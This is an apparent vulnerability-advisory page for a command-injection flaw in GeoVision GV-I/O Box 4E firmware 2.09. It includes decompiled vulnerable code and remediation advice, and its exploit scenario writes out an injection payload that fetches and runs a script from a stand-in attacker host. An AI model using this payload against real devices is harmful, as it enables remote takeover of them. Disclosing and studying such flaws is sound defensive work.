Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Network-reachable services (AV:N), trivial sprintf-to-system primitive (AC:L), requires admin auth to invoke the config path (PR:H), command execution escapes service context (S:C) with full CIA impact.
Primary rating from Vendor (GV).
CVSS VectorVendor: GV
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.
libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)
CNetSetObj::m_F_n_Set_IP_Addr command injection
The following function takes a string as an ip address, performs no sanitization and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.
int __fastcall CNetSetObj::m_F_n_Set_IP_Addr(const char **this, char *ip_addr)
{
bool v2; // zf
char v4[72]; // [sp+0h] [bp-48h] BYREF
v2 = *this == 0;
if ( *this )
v2 = ip_addr == 0;
if ( v2 )
return 0;
sprintf(v4, "/sbin/ifconfig %s %s", *this, ip_addr); // attacker controlled ip address
system(v4);
return 1;
}
AnalysisAI
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows remote attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the libNetSetObj.so library via the DVRSearch service or Network.cgi endpoint. The flaw stems from unsanitized attacker-controlled IP address input passed directly to system() in CNetSetObj::m_F_n_Set_IP_Addr. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires network reachability to either the DVRSearch service or the Network.cgi web endpoint on a GeoVision GV-I/O Box 4E running firmware 2.09, and CVSS PR:H indicates the attacker must already hold high-privilege authentication to the device (typically administrator credentials for the configuration interface). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 score of 9.1 (Critical) reflects network vector (AV:N), low complexity (AC:L), no user interaction (UI:N), high impact across CIA, and scope change (S:C) due to command execution under the device's service context, but it explicitly requires high privileges (PR:H) - meaning the attacker must already hold authenticated access. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained or guessed administrative credentials (or who reaches the device on a flat network where credentials are weak or default) sends an HTTP request to Network.cgi or a crafted DVRSearch packet supplying an IP address parameter containing shell metacharacters such as `; wget http://attacker/x | sh`. The sprintf into the ifconfig command string causes system() to execute the injected command under the service's privilege context, yielding remote code execution on the appliance. … |
| Remediation | No vendor-released patch identified at time of analysis from the provided data; defenders should monitor https://www.geovision.com.tw/cyber_security.php for a firmware update addressing CVE-2026-12486 and apply the fixed firmware to all GV-I/O Box 4E units as soon as it is published. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Immediately identify and isolate all GeoVision GV-I/O Box 4E devices running firmware 2.09 to restricted network segments with access controls limiting connections to essential administrative hosts only. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Gv I O Box 4E
View allStack-based buffer overflow in GeoVision GV-I/O Box 4E embedded I/O controllers allows unauthenticated network attackers
Remote unauthenticated stack-based buffer overflow in GeoVision GV-I/O Box 4E smart I/O appliances allows any host on th
Stack-based buffer overflow in the GeoVision GV-I/O Box 4E DVRSearch service allows unauthenticated network attackers to
Stack-based buffer overflow in GeoVision GV-I/O Box 4E allows unauthenticated remote attackers to overflow a fixed-size
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows authenticated remote attackers to execute arbitrary
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute ar
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers who can reach the device's network servic
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38650
GHSA-4rgm-6fq6-4x7q